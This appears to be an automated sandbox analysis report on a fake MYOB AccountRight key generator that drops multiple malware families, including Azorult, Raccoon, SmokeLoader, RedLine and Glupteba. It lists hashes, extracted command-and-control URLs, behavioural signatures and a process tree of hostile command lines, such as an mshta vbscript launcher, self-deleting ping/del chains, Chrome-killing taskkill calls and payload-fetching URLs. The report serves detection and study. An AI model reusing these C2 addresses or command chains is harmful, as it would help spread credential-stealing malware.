Analysis
-
max time kernel
96s -
max time network
603s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
10-03-2021 05:22
General
-
Target
Myob_Accountright_Plus_19_0_key_generator.exe
-
Size
8.2MB
-
MD5
952996743eb4a668b63ede4dfb4c955a
-
SHA1
d2094fc439aae23d2dd4a3e353867bede987cf8d
-
SHA256
ac0fd3d8f29a9ba792cc7e9f6aa6f077354ebccbd3e68cfa81cf6dd3e5247f30
-
SHA512
da3b52ec006537fefe96ca3ed103004886c093492e1c2d015a7c69ea52891960d585b6092e62d736ea7166fc93aa2a073c5b10351b032852e825764446710f42
Score
10/10
Malware Config
Extracted
Family
azorult
C2
http://kvaka.li/1210776429.php
Extracted
Family
raccoon
Botnet
51c194bfb6e404af0e5ff0b93b443907a6a845b1
Attributes
-
url4cnc
https://telete.in/h_focus_1
rc4.plain
rc4.plain
Extracted
Family
metasploit
Version
windows/single_exec
Extracted
Family
smokeloader
Version
2019
C2
http://10022020newfolder1002002131-service1002.space/
http://10022020newfolder1002002231-service1002.space/
http://10022020newfolder3100231-service1002.space/
http://10022020newfolder1002002431-service1002.space/
http://10022020newfolder1002002531-service1002.space/
http://10022020newfolder33417-01242510022020.space/
http://10022020test125831-service1002012510022020.space/
http://10022020test136831-service1002012510022020.space/
http://10022020test147831-service1002012510022020.space/
http://10022020test146831-service1002012510022020.space/
http://10022020test134831-service1002012510022020.space/
http://10022020est213531-service100201242510022020.ru/
http://10022020yes1t3481-service1002012510022020.ru/
http://10022020test13561-service1002012510022020.su/
http://10022020test14781-service1002012510022020.info/
http://10022020test13461-service1002012510022020.net/
http://10022020test15671-service1002012510022020.tech/
http://10022020test12671-service1002012510022020.online/
http://10022020utest1341-service1002012510022020.ru/
http://10022020uest71-service100201dom2510022020.ru/
rc4.i32
rc4.i32
Extracted
Family
smokeloader
Version
2020
C2
http://naritouzina.net/
http://nukaraguasleep.net/
http://notfortuaj.net/
http://natuturalistic.net/
http://zaniolofusa.net/
rc4.i32
rc4.i32
Extracted
Family
raccoon
Botnet
afefd33a49c7cbd55d417545269920f24c85aa37
Attributes
-
url4cnc
https://telete.in/jagressor_kz
rc4.plain
rc4.plain
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Glupteba
Glupteba is a modular loader written in Golang with various components.
-
Glupteba Payload 3 IoCs
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
PlugX
PlugX is a RAT (Remote Access Trojan) that has been around since 2008.
-
Raccoon
Simple but powerful infostealer which was very active in 2019.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 8 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Modifies boot configuration data using bcdedit 15 IoCs
-
Nirsoft 6 IoCs
-
Blocklisted process makes network request 15 IoCs
-
Drops file in Drivers directory 3 IoCs
-
Executes dropped EXE 64 IoCs
-
Modifies Windows Firewall 1 TTPs
-
Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
-
Sets service image path in registry 2 TTPs
-
Suspicious Office macro 1 IoCs
Office document equipped with 4.0 macros.
-
UPX packed file 4 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
-
Loads dropped DLL 40 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 5 IoCs
-
Checks for any installed AV software in registry 1 TTPs 53 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 3 IoCs
-
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 53 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
-
Writes to the Master Boot Record (MBR) 1 TTPs 4 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
-
Drops file in System32 directory 19 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Suspicious use of SetThreadContext 8 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 11 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 22 IoCs
-
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 5 IoCs
-
Enumerates system info in registry 2 TTPs 2 IoCs
-
GoLang User-Agent 12 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
-
Kills process with taskkill 21 IoCs
-
Modifies Internet Explorer settings 1 TTPs 3 IoCs
-
Modifies data under HKEY_USERS 46 IoCs
-
Modifies registry class 64 IoCs
-
Modifies system certificate store 2 TTPs 17 IoCs
-
Runs .reg file with regedit 2 IoCs
-
Runs ping.exe 1 TTPs 6 IoCs
-
Script User-Agent 48 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious behavior: MapViewOfSection 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SetWindowsHookEx 42 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Myob_Accountright_Plus_19_0_key_generator.exe"C:\Users\Admin\AppData\Local\Temp\Myob_Accountright_Plus_19_0_key_generator.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"4⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"5⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
-
C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exeC:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe 0011 installp15⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetThreadContext
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"6⤵
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Roaming\1615354024190.exe"C:\Users\Admin\AppData\Roaming\1615354024190.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615354024190.txt"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"6⤵
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Roaming\1615354028456.exe"C:\Users\Admin\AppData\Roaming\1615354028456.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615354028456.txt"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"6⤵
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Roaming\1615354033690.exe"C:\Users\Admin\AppData\Roaming\1615354033690.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615354033690.txt"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exeC:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP6⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exeC:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe /silent6⤵
-
C:\Users\Admin\AppData\Local\Temp\is-0N94T.tmp\23E04C4F32EF2158.tmp"C:\Users\Admin\AppData\Local\Temp\is-0N94T.tmp\23E04C4F32EF2158.tmp" /SL5="$105A6,762308,115712,C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe" /silent7⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c "start https://iplogger.org/14Zhe7"8⤵
-
-
C:\Program Files (x86)\DTS\seed.sfx.exe"C:\Program Files (x86)\DTS\seed.sfx.exe" -pX7mdks39WE0 -s18⤵
-
C:\Program Files (x86)\Seed Trade\Seed\seed.exe"C:\Program Files (x86)\Seed Trade\Seed\seed.exe"9⤵
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe"6⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 37⤵
- Runs ping.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exeC:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe 200 installp15⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe"6⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 37⤵
- Runs ping.exe
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 36⤵
- Runs ping.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\SI484NIRL5\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\SI484NIRL5\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\SI484NIRL5\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\SI484NIRL5\multitimer.exe" 1 3.1615353818.604857daf0322 1016⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\SI484NIRL5\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\SI484NIRL5\multitimer.exe" 2 3.1615353818.604857daf03227⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
- Maps connected drives based on registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\vzjdjcfpinq\wxqhvcpn0bf.exe"C:\Users\Admin\AppData\Local\Temp\vzjdjcfpinq\wxqhvcpn0bf.exe" /VERYSILENT8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-SP9IC.tmp\wxqhvcpn0bf.tmp"C:\Users\Admin\AppData\Local\Temp\is-SP9IC.tmp\wxqhvcpn0bf.tmp" /SL5="$901E8,870426,780800,C:\Users\Admin\AppData\Local\Temp\vzjdjcfpinq\wxqhvcpn0bf.exe" /VERYSILENT9⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-AKRVE.tmp\winlthst.exe"C:\Users\Admin\AppData\Local\Temp\is-AKRVE.tmp\winlthst.exe" test1 test110⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1332 -s 86811⤵
- Program crash
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\34vvtrfdee3\id1v20wqnjd.exe"C:\Users\Admin\AppData\Local\Temp\34vvtrfdee3\id1v20wqnjd.exe" testparams8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\ezgqiwaw4wj\jobyfr3bzz5.exe"C:\Users\Admin\AppData\Roaming\ezgqiwaw4wj\jobyfr3bzz5.exe" /VERYSILENT /p=testparams9⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-IE1MH.tmp\jobyfr3bzz5.tmp"C:\Users\Admin\AppData\Local\Temp\is-IE1MH.tmp\jobyfr3bzz5.tmp" /SL5="$3025E,552809,216064,C:\Users\Admin\AppData\Roaming\ezgqiwaw4wj\jobyfr3bzz5.exe" /VERYSILENT /p=testparams10⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\vxhqx10e5ft\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\vxhqx10e5ft\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-JCTME.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-JCTME.tmp\IBInstaller_97039.tmp" /SL5="$102B8,14439881,721408,C:\Users\Admin\AppData\Local\Temp\vxhqx10e5ft\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq9⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://gemstrue.shop/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=9703910⤵
- Checks computer location settings
-
-
C:\Users\Admin\AppData\Local\Temp\is-J8FS1.tmp\{app}\chrome_proxy.exe"C:\Users\Admin\AppData\Local\Temp\is-J8FS1.tmp\{app}\chrome_proxy.exe"10⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-J8FS1.tmp\{app}\chrome_proxy.exe"11⤵
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 412⤵
- Runs ping.exe
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\vo111w2gtk0\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\vo111w2gtk0\Setup3310.exe" /Verysilent /subid=5778⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-155NF.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-155NF.tmp\Setup3310.tmp" /SL5="$102D0,802346,56832,C:\Users\Admin\AppData\Local\Temp\vo111w2gtk0\Setup3310.exe" /Verysilent /subid=5779⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-O9BTF.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-O9BTF.tmp\Setup.exe" /Verysilent10⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-PCJ0Q.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-PCJ0Q.tmp\Setup.tmp" /SL5="$20448,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-O9BTF.tmp\Setup.exe" /Verysilent11⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-C3S5J.tmp\Messure.exe"C:\Users\Admin\AppData\Local\Temp\is-C3S5J.tmp\Messure.exe" /Verysilent12⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-MN03C.tmp\Messure.tmp"C:\Users\Admin\AppData\Local\Temp\is-MN03C.tmp\Messure.tmp" /SL5="$302E4,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-C3S5J.tmp\Messure.exe" /Verysilent13⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-HO8I6.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-HO8I6.tmp\Setup.exe" /VERYSILENT14⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
C:\ProgramData\3GzhBdrEazKFpDWZPQsyJa7TxsUGTNMcb2FDh.tmpC:\ProgramData\3GzhBdrEazKFpDWZPQsyJa7TxsUGTNMcb2FDh.tmp15⤵
-
C:\ProgramData\3GzhBdrEazKFpDWZPQsyJa7TxsUGTNMcb2FDh.tmp"{path}"16⤵
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-C3S5J.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-C3S5J.tmp\PictureLAb.exe" /Verysilent12⤵
-
C:\Users\Admin\AppData\Local\Temp\is-I00D7.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-I00D7.tmp\PictureLAb.tmp" /SL5="$3039C,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-C3S5J.tmp\PictureLAb.exe" /Verysilent13⤵
-
C:\Users\Admin\AppData\Local\Temp\is-EKOKD.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-EKOKD.tmp\Setup.exe" /VERYSILENT14⤵
-
C:\Users\Admin\AppData\Local\Temp\is-SOG0F.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-SOG0F.tmp\Setup.tmp" /SL5="$204E2,298255,214528,C:\Users\Admin\AppData\Local\Temp\is-EKOKD.tmp\Setup.exe" /VERYSILENT15⤵
-
C:\Users\Admin\AppData\Local\Temp\is-VV2PA.tmp\def.exe"C:\Users\Admin\AppData\Local\Temp\is-VV2PA.tmp\def.exe" /S /UID=lab21416⤵
-
C:\Program Files\Microsoft Office 15\BJWDNHFWMA\prolab.exe"C:\Program Files\Microsoft Office 15\BJWDNHFWMA\prolab.exe" /VERYSILENT17⤵
-
C:\Users\Admin\AppData\Local\Temp\is-J7LN4.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-J7LN4.tmp\prolab.tmp" /SL5="$604C6,575243,216576,C:\Program Files\Microsoft Office 15\BJWDNHFWMA\prolab.exe" /VERYSILENT18⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\e6-b5a20-0eb-209a8-1b4144a31ec9c\Tyqegozhaky.exe"C:\Users\Admin\AppData\Local\Temp\e6-b5a20-0eb-209a8-1b4144a31ec9c\Tyqegozhaky.exe"17⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0slror0q.5tw\md7_7dfj.exe & exit18⤵
-
C:\Users\Admin\AppData\Local\Temp\0slror0q.5tw\md7_7dfj.exeC:\Users\Admin\AppData\Local\Temp\0slror0q.5tw\md7_7dfj.exe19⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\33arngmd.s4g\askinstall18.exe & exit18⤵
-
C:\Users\Admin\AppData\Local\Temp\33arngmd.s4g\askinstall18.exeC:\Users\Admin\AppData\Local\Temp\33arngmd.s4g\askinstall18.exe19⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe20⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe21⤵
- Kills process with taskkill
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4xzm2rdt.was\customer4.exe & exit18⤵
-
C:\Users\Admin\AppData\Local\Temp\4xzm2rdt.was\customer4.exeC:\Users\Admin\AppData\Local\Temp\4xzm2rdt.was\customer4.exe19⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"20⤵
-
C:\Windows\regedit.exeregedit /s chrome.reg21⤵
- Runs .reg file with regedit
-
-
C:\Windows\SYSTEM32\TASKKILL.exeTASKKILL /F /IM chrome.exe21⤵
- Kills process with taskkill
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c chrome64.bat21⤵
-
C:\Windows\system32\mshta.exemshta vbscript:createobject("wscript.shell").run("chrome64.bat h",0)(window.close)22⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX3\chrome64.bat" h"23⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:/Program Files/Google/Chrome/Application/chrome.exe"24⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ffaee066e00,0x7ffaee066e10,0x7ffaee066e2025⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1640 /prefetch:825⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1588 /prefetch:225⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2692 /prefetch:125⤵
- Modifies Internet Explorer settings
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2688 /prefetch:125⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3224 /prefetch:825⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3644 /prefetch:125⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3620 /prefetch:125⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3476 /prefetch:125⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4140 /prefetch:825⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1572,7079114197626367824,13709903837454121356,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3636 /prefetch:125⤵
-
-
